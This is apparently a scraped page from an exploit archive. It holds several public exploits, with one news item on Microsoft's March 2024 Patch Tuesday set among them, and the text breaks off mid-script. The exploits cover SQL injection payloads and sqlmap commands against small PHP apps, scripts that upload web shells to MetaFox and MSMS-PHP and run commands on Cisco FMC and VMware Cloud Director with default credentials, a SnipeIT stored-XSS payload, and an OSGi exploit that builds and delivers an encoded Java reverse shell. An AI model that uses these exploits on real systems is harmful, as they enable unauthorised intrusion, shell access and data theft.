Client Details System version 1.0 suffers from a remote SQL injection vulnerability.

    + **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1+ **Date:** 2023-26-12+ **Exploit Author:** Hamdi Sevben+ **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/+ **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip+ **Version:** 1.0+ **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53+ **CVE:** CVE-2023-7137## References: + **CVE-2023-7137:** https://vuldb.com/?id.249140+ https://www.cve.org/CVERecord?id=CVE-2023-7137+ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137+ https://nvd.nist.gov/vuln/detail/CVE-2023-7137## Description:Client Details System 1.0 allows SQL Injection via parameter 'uemail' in "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data,  or exploit latest vulnerabilities in the underlying database.## Proof of Concept:+ Go to the User Login page: "http://localhost/clientdetails/"+ Fill email and password.+ Intercept the request via Burp Suite and send to Repeater.+ Copy and paste the request to a "r.txt" file.+ Captured Burp request:```POST /clientdetails/ HTTP/1.1Host: localhostAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheContent-Length: 317Content-Type: application/x-www-form-urlencodedReferer: http://localhost/clientdetails/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36uemail=user@mail.com&login=LOG+IN&password=P@ass123```+ Use sqlmap to exploit. In sqlmap, use 'uemail' parameter to dump the database. ```python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db``````---Parameter: uemail (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: uemail=user@mail.com' OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: uemail=user@mail.com' AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: uemail=user@mail.com' AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123    Type: UNION query    Title: Generic UNION query (NULL) - 7 columns    Payload: uemail=user@mail.com' UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123---[14:58:11] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.53, PHP, PHP 8.1.6back-end DBMS: MySQL >= 5.0 (MariaDB fork)[14:58:11] [INFO] fetching current databasecurrent database: 'loginsystem'```+ current database: `loginsystem`![1](https://github.com/h4md153v63n/CVEs/assets/5091265/bfbec122-5b56-42df-beda-41dfdcaf527a)

Client Details System 1.0 SQL Injection

MetaFox versions 5.1.8 and below suffer from a remote shell upload vulnerability.

    #!/usr/bin/env python3# Exploit Title: MetaFox Remote Shell Upload# Google Dork: "Social network for niche communities"# Exploit Author: The Joker# Vendor Homepage: https://www.phpfox.com# Version: <= 5.1.8import jsonimport requestsimport sysif len(sys.argv) != 4:   sys.exit("Usage: %s " % sys.argv[0])   requests.packages.urllib3.disable_warnings()endpoint = sys.argv[1] + "/api/v1/user/login"response = requests.post(endpoint, json={"username": sys.argv[2], "password": sys.argv[3]}, verify=False)json_response = json.loads(response.text)if not "access_token" in json_response:   sys.exit("Login failed!")print("Login success! Uploading shell")token = json_response["access_token"]endpoint = sys.argv[1] + "/api/v1/files"files = {"file[0]": ("wtf.php", "")}response = requests.post(endpoint, files=files, headers={"Authorization": "Bearer " + token}, verify=False)json_response = json.loads(response.text)if not "data" in json_response or not "url" in json_response["data"][0]:   sys.exit("Upload failed!")shell_url = json_response["data"][0]["url"]print("Shell uploaded at %s\n" % shell_url)while True:   command = input("$ ")   response = requests.post(shell_url, data={"command": command}, verify=False)   print(response.text)

MetaFox 5.1.8 Shell Upload

Cisco Firepower Management Center suffers from an authenticated remote command execution vulnerability. Many versions spanning the 7.x.x.x and 6.x.x.x branches are affected.

# Exploit Title: [Cisco Firepower Management Center]  
# Google Dork: [non]  
# Date: [12/06/2023]  
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)  
# Version: [6.2.3.18", "6.4.0.16", "6.6.7.1]  
# CVE : [CVE-2023-20048]

import requests  
import json

# set the variables for the URL, username, and password for the FMC web services interface  
fmc_url = "https://fmc.example.com"  
fmc_user = "admin"  
fmc_pass = "cisco123"

# create a requests session to handle cookies and certificate verification  
session = requests.Session()  
session.verify = False

# send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token  
token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken"  
response = session.post(token_url, auth=(fmc_user, fmc_pass))

# check the response status and extract the access token and refresh token from the response headers  
# set the access token as the authorization header for the subsequent requests  
try:  
    if response.status_code == 200:  
        access_token = response.headers["X-auth-access-token"]  
        refresh_token = response.headers["X-auth-refresh-token"]  
        session.headers["Authorization"] = access_token  
    else:  
        print("Failed to get tokens, status code: " + str(response.status_code))  
        exit()  
except Exception as e:  
    print(e)  
    exit()

# set the variable for the domain id  
# change this to your domain id  
domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f"

# send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC  
devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords"  
response = session.get(devices_url)

# check the response status and extract the data as a json object  
try:  
    if response.status_code == 200:  
        data = response.json()  
    else:  
        print("Failed to get devices, status code: " + str(response.status_code))  
        exit()  
except Exception as e:  
    print(e)  
    exit()

# parse the data to get the list of device names and URLs  
devices = []  
for item in data["items"]:  
    device_name = item["name"]  
    device_url = item["links"]["self"]  
    devices.append((device_name, device_url))

# loop through the list of devices and send a GET request to the URL of each device to get the device details  
for device in devices:  
    device_name, device_url = device  
    response = session.get(device_url)

    # check the response status and extract the data as a json object  
    try:  
        if response.status_code == 200:  
            data = response.json()  
        else:  
            print("Failed to get device details, status code: " + str(response.status_code))  
            continue  
    except Exception as e:  
        print(e)  
        continue

    # parse the data to get the device type, software version, and configuration URL  
    device_type = data["type"]  
    device_version = data["metadata"]["softwareVersion"]  
    config_url = data["metadata"]["configURL"]

    # check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability  
    # use the values from the affected products section in the security advisory  
    if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]:  
        print("Device " + device_name + " is vulnerable to CVE-2023-20048")

        # create a list of commands that you want to execute on the device  
        commands = ["show version", "show running-config", "show interfaces"]  
        device_id = device_url.split("/")[-1]

        # loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device  
        # replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute  
        for command in commands:  
            command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command  
            response = session.post(command_url)

            # check the response status and extract the data as a json object  
            try:  
                if response.status_code == 200:  
                    data = response.json()  
                else:  
                    print("Failed to execute command, status code: " + str(response.status_code))  
                    continue  
            except Exception as e:  
                print(e)  
                continue

            # parse the data to get the result of the command execution and print it  
            result = data["result"]  
            print("Command: " + command)  
            print("Result: " + result)

    else:  
        print("Device " + device_name + " is not vulnerable to CVE-2023-20048")

Cisco Firepower Management Center Remote Command Execution

Microsoft patched 61 vulnerabilities in the March 2024 Patch Tuesday round, including two critical flaws in Hyper-V.

The March 2024 Patch Tuesday update includes patches for 61 Microsoft vulnerabilities. Only two of the vulnerabilities are rated critical and both of these are found in Windows Hyper-V.

Hyper-V is a hardware virtualization product that allows you to run multiple operating systems as virtual machines (VMs) on Windows. A virtual machine is a computer program that emulates a physical computer. A physical “host” computer can run multiple separate “guest” VMs that are isolated from each other, and from the host. The physical resources of the host are allocated to the VMs by a software layer called the hypervisor, which acts an intermediary between the host and guests.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The Hyper-V CVEs patched in this round of updates are:

CVE-2024-21407 is a Windows Hyper-V Remote Code Execution (RCE) vulnerability with a CVSS score of 8.1 out of 10. Microsoft says exploitation is less likely since this vulnerability would require an authenticated attacker on a guest to send specially crafted file operation requests to hardware resources on the VM which could result in remote code execution on the host server.

This means the attacker would need a good deal of information about the specific environment, and to take additional actions prior to exploitation to prepare the target environment.

CVE-2024-21408 is a Windows Hyper-V Denial of Service (DOS) vulnerability with a CVSS score of 5.5 out of 10. This means an attacker could target a host machine from a guest and cause it to crash or stop functioning. However, Microsoft did not provide any additional details on how this DOS could occur.

The attention for Hyper-V is remarkable since only a week earlier, VMware released security updates to fix critical sandbox escape vulnerabilities in VMware ESXi, Workstation, Fusion, and Cloud Foundation. VMware ESXi and Hyper-V are both designed to handle large-scale virtualization deployments.

Another vulnerability worth mentioning is CVE-2024-21334, which has a CVSS score of 9.8 out of 10. It’s an Open Management Infrastructure (OMI) RCE vulnerability that affects System Center Operations Manager (SCOM). SCOM is a set of tools in Microsoft’s System Center for infrastructure monitoring and application performance management. A remote, unauthenticated attacker could exploit this vulnerability by accessing the OMI instance from the internet and sending specially crafted requests to trigger a use-after-free vulnerability.

OMI is an open source technology for environment management software products for Linux and Unix-based systems. The OMI project was set up to implement standards-based management so that every device in the world can be managed in a clear, consistent, and coherent way.

Use-after-free vulnerabilities are the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can exploit the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.

Microsoft states that if the Linux machines do not need network listening, OMI incoming ports can be disabled. In other cases, customers running affected versions of SCOM (System Center Operations Manager 2019 and 2022) should update to OMI version 1.8.1-0.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

**Adobe** has released security updates to address vulnerabilities in several products:

*   Adobe Experience Manager
*   Adobe Premiere Pro
*   Adobe ColdFusion
*   Adobe Bridge
*   Adobe Lightroom
*   Adobe Animate

The **Android** Security Bulletin for February contains details of security vulnerabilities for patch level 2024-03-05 or later.

**Apple** has released a security update for iOS and iPadOS to patch two zero-day vulnerabilities

**SAP** has released its March 2024 Patch Day updates.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

 Microsoft Patch Tuesday March 2024 includes critical Hyper-V flaws 

SnipeIT version 6.2.1 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: SnipeIT 6.2.1 - Stored Cross Site ScriptingDate: 06-Oct-2023Exploit Author: Shahzaib Ali KhanVendor Homepage: https://snipeitapp.comSoftware Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1Version: 6.2.1Tested on: Windows 11 22H2 and Ubuntu 20.04CVE: CVE-2023-5452Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting(XSS) feature that allows attackers to execute JavaScript commands. Thelocation endpoint was vulnerable.Steps to Reproduce:1. Login as a standard user [non-admin] > Asset page > List All2. Click to open any asset > Edit Asset3. Create new location and add the payload:<script>alert(document.cookie)</script>4. Now login to any other non-admin or admin > Asset page > List All5. Open the same asset of which you can change the location and the payloadwill get executed.POC Request:POST /api/v1/locations HTTP/1.1Host: localhostContent-Length: 118Accept: */*X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGVX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://localhostReferer: http://localhost/hardware/196/editAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO;assetsListingTable.bs.table.cardView=false; laravel_token=eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNMd2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa001MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D;XSRF-TOKEN=eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bHFWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3DConnection: closename=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country=Thanks,Shahzaib Ali Khan

SnipeIT 6.2.1 Cross Site Scripting

MSMS-PHP version 1.0 suffers from a remote shell upload vulnerability.

    ## Title: MSMS-PHP (by: oretnom23 ) v1.0 File Upload - RCE browser using## Author: nu11secur1ty## Date: 03/13/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/file-upload## Description:The upload function and id=cimg parameter are not sanitizing correctly!The attacker can upload any PHP file which he can execute directly onthe server!STATUS: HIGH-CrITICAL Vulnerability[+]Payload:```POSTPOST /mobile_store/classes/SystemSettings.php?f=update_settings HTTP/1.1Host: localhostContent-Length: 6318sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data;boundary=----WebKitFormBoundarypV7nBYU4nAonvWelX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/mobile_store/admin/?page=system_infoAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=b6i4kegv7jonjlu44gtuo8i4dgConnection: close------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="name"Mobile Store Management System - PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="short_name"MSMS-PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="about_us"<p style="text-align: center; margin-right: 0px; margin-bottom: 0px;margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size:70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding:0px; clear: both; border-top: 0px; height: 1px; background-image:linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75),rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding:0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px-160px; padding: 0px; position: sticky; top: 20px; width: 160px;height: 10px; float: left; text-align: right; color: rgb(0, 0, 0);font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div id="bannerR"style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky;top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0,0); font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div class="boxed"style="margin: 10px 28.7969px; padding: 0px; clear: both; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-size:14px; text-align: center; background-color: rgb(255, 255, 255);"><divid="lipsum" style="margin: 0px; padding: 0px; text-align:justify;"></div></div></div><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsumdolor sit amet, consectetur adipiscing elit. Nullam non ultricestortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenasiaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blanditvulputate magna, non lobortis velit pharetra vel. Morbi sollicitudinlorem sed augue suscipit, eu commodo tortor vulputate. Interdum etmalesuada fames ac ante ipsum primis in faucibus. Pellentesquehabitant morbi tristique senectus et netus et malesuada fames acturpis egestas. Praesent eleifend interdum est, at gravida eratmolestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabituret viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamusporttitor ac risus eu ultricies. Morbi malesuada mi vel luctussagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris atlacus vehicula, aliquam purus quis, pharetra lorem.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Proin consectetur massa ut quam molestie porta. Donecsit amet ligula odio. Class aptent taciti sociosqu ad litora torquentper conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinarac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eublandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifendid, aliquet ut libero. Nunc scelerisque vulputate turpis quisvolutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulumimperdiet, nulla vitae pharetra pretium, magna felis placerat libero,quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorpercursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapienconsectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitaetortor vestibulum consequat ac quis risus. Sed finibus pharetra orci,id vehicula tellus eleifend sit amet.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Morbi id antevel velit mollis egestas. Suspendisse pretium sem urna, vitae placeratturpis cursus faucibus. Ut dignissim molestie blandit. Phaselluspulvinar, eros id ultricies mollis, lectus velit viverra mi, atvenenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibhfelis. Donec faucibus, nulla at faucibus blandit, mi justo efficiturdui, non mattis nisl purus non lacus. Maecenas vel congue tellus, inconvallis nisi. Curabitur faucibus interdum massa, eu facilisis ligulapretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Ut et urna sapien. Nulla lacinia sagittis felis idcursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elitultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies nonlorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, atpharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada,vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, intincidunt mi. Aliquam sodales aliquam felis, eget tristique felisdictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesquemauris. Quisque sit amet varius augue.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sed quisimperdiet est. Donec lobortis tortor id neque tempus, vel faucibuslorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristiquenunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitaenisi. Curabitur at quam ut libero convallis mattis vel eget mauris.Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximusnulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrumnon magna at, molestie gravida magna. Aenean neque sapien, volutpat aullamcorper nec, iaculis quis est.</p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="privacy_policy"<p>Sample Privacy Policy<br></p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="img"; filename="info.php"Content-Type: application/octet-stream<?php  phpinfo();?>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="cover"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="banners[]"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWel--```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0/FU)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-file-upload.html)## Time spent:00:05:00

MSMS-PHP 1.0 Shell Upload

MSMS-PHP version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: MSMS-PHP (by: oretnom23 ) v1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 03/13/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:This issue was generated by the BCheck: puncher_SQLi_bypass_authentication.There is a change in response when nu11secur1ty' or 1=1# is injected.Potential SQLi detected. Please confirm it manually after you checkthe POST, GET, or other requests... The payload from thepuncher_SQLi_bypass_authentication module was submitted successfullyafter the test. The `search` parameter is vulnerable for Multiple SQLiattacks. The attacker can get all information from the system by usingthis vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: search (GET)    Type: error-based    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)    Payload: p=products&search=-9068') OR 1 GROUP BYCONCAT(0x716b717671,(SELECT (CASE WHEN (4449=4449) THEN 1 ELSE 0END)),0x71706b7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#    Type: UNION query    Title: MySQL UNION query (random number) - 9 columns    Payload: p=products&search=-7515') UNION ALL SELECT2313,2313,2313,2313,CONCAT(0x716b717671,0x6e73537a656d74516c6d6751704b58725771474449755548546a50537054586f6656546a78447941,0x71706b7a71),2313,2313,2313,2313#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-multiple-sqli.html)## Time spend:00:15:00

MSMS-PHP 1.0 SQL Injection

VMware Cloud Director version 10.5 suffers from an authentication bypass vulnerability.

    # Exploit Title: [VMware Cloud Director | Bypass identity verification]# Google Dork: [non]# Date: [12/06/2023]# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)# Version: [10.5]# CVE : [CVE-2023-34060]import requestsimport paramikoimport subprocessimport socketimport argparseimport threading# Define a function to check if a port is opendef is_port_open(ip, port):    # Create a socket object    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    # Set the timeout to 1 second    s.settimeout(1)    # Try to connect to the port    try:        s.connect((ip, port))        # The port is open        return True    except:        # The port is closed        return False    finally:        # Close the socket        s.close()# Define a function to exploit a vulnerable devicedef exploit_device(ip, port, username, password, command):    # Create a ssh client object    client = paramiko.SSHClient()    # Set the policy to accept any host key    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())    # Connect to the target using the credentials    client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)    # Execute the command and get the output    stdin, stdout, stderr = client.exec_command(command)    # Print the output    print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")    # Close the ssh connection    client.close()# Parse the arguments from the userparser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")parser.add_argument("ip", help="The target IP address")parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")parser.add_argument("-u", "--username", default="root", help="The username for ssh")parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")args = parser.parse_args()# Loop through the ports and check for the vulnerabilityfor port in args.ports:    # Check if the port is open    if is_port_open(args.ip, port):        # The port is open, send a GET request to the port and check the status code        response = requests.get(f"http://{args.ip}:{port}")        if response.status_code == 200:            # The port is open and vulnerable            print(f"Port {port} is vulnerable to CVE-2023-34060")            # Create a thread to exploit the device            thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))            # Start the thread            thread.start()        else:            # The port is open but not vulnerable            print(f"Port {port} is not vulnerable to CVE-2023-34060")    else:        # The port is closed        print(f"Port {port} is closed")

VMware Cloud Director 10.5 Authentication Bypass

OSGi versions 3.7.2 and below suffer from a remote code execution vulnerability.

    #!/usr/bin/python# Exploit Title: [OSGi v3.7.2 Console RCE]# Date: [2023-07-28]# Exploit Author: [Andrzej Olchawa, Milenko Starcik,#                  VisionSpace Technologies GmbH]# Exploit Repository:#           [https://github.com/visionspacetec/offsec-osgi-exploits.git]# Vendor Homepage: [https://eclipse.dev/equinox]# Software Link: [https://archive.eclipse.org/equinox/]# Version: [3.7.2 and before]# Tested on: [Linux kali 6.3.0-kali1-amd64]# License: [MIT]## Usage:# python exploit.py --help## Examples:# python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \#   --lport=4444## python exploit.py --rhost=localhost --rport=1337 --payload= \#   "curl http://192.168.100.100/osgi_test""""This is an exploit that allows to open a reverse shell connection fromthe system running OSGi v3.7.2 and earlier."""import argparseimport base64import socketdef parse():    """    This fnction is used to parse and return command-line arguments.    """    parser = argparse.ArgumentParser(        prog="OSGi-3.7.2-console-RCE",        description="This tool will let you open a reverse shell from the "                    "system that is running OSGi with the '-console' "                    "option in version 3.7.2 (or before).",        epilog="Happy Hacking! :)",    )    parser.add_argument("--rhost", dest="rhost",                        help="remote host", type=str, required=True)    parser.add_argument("--rport", dest="rport",                        help="remote port", type=int, required=True)    parser.add_argument("--lhost", dest="lhost",                        help="local host", type=str, required=False)    parser.add_argument("--lport", dest="lport",                        help="local port", type=int, required=False)    parser.add_argument("--payload", dest="custom_payload",                        help="custom payload", type=str, required=False)    parser.add_argument("--version", action="version",                        version="%(prog)s 0.1.0")    args = parser.parse_args()    if args.custom_payload and (args.lhost or args.lport):        parser.error(            "either --payload or both --lport and --rport are required.")    return argsdef generate_payload(lhost, lport, custom_payload):    """    This function generates the whole payload ready for the delivery.    """    payload = ""    if custom_payload:        payload = custom_payload        print("(*) Using custom payload.")    elif lhost and lport:        payload = \            "echo 'import java.io.IOException;import java.io.InputStream;" \            "import java.io.OutputStream;import java.net.Socket;class Rev" \            "Shell {public static void main(String[] args) throws Excepti" \            "on { String host=\"%s\";int port=%s;String cmd=\"sh\";Proces" \            "s p=new ProcessBuilder(cmd).redirectErrorStream(true).start(" \            ");Socket s=new Socket(host,port);InputStream pi=p.getInputSt" \            "ream(),pe=p.getErrorStream(), si=s.getInputStream();OutputSt" \            "ream po=p.getOutputStream(), so=s.getOutputStream();while(!s" \            ".isClosed()){while(pi.available()>0)so.write(pi.read());whil" \            "e(pe.available()>0)so.write(pe.read());while(si.available()>" \            "0)po.write(si.read());so.flush();po.flush();Thread.sleep(50)" \            ";try {p.exitValue();break;}catch (Exception e){}};p.destroy(" \            ");s.close();}}' > RevShell.java ; java ./RevShell.java" % (                lhost, lport)        print("(+) Using Java reverse shell payload.")    bash_payload = b"bash -c {echo,%s}|{base64,-d}|{bash,-i}" % (        base64.b64encode(payload.encode()))    wrapped_payload = b"fork \"%s\"\n" % (bash_payload)    return wrapped_payloaddef deliver_payload(rhost, rport, payload):    """    This function connects to the target host and delivers the payload.    It returns True if successful; False otherwise.    """    print("(*) Sending payload...")    try:        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        sock.connect((rhost, rport))        sock.send(payload)        sock.close()    except socket.error as err:        print(f"(-) Could not deliver the payload to {rhost}:{rport}!")        print(err)        return False    return Truedef main(args):    """    Main function.    """    payload = generate_payload(args.lhost, args.lport, args.custom_payload)    success = 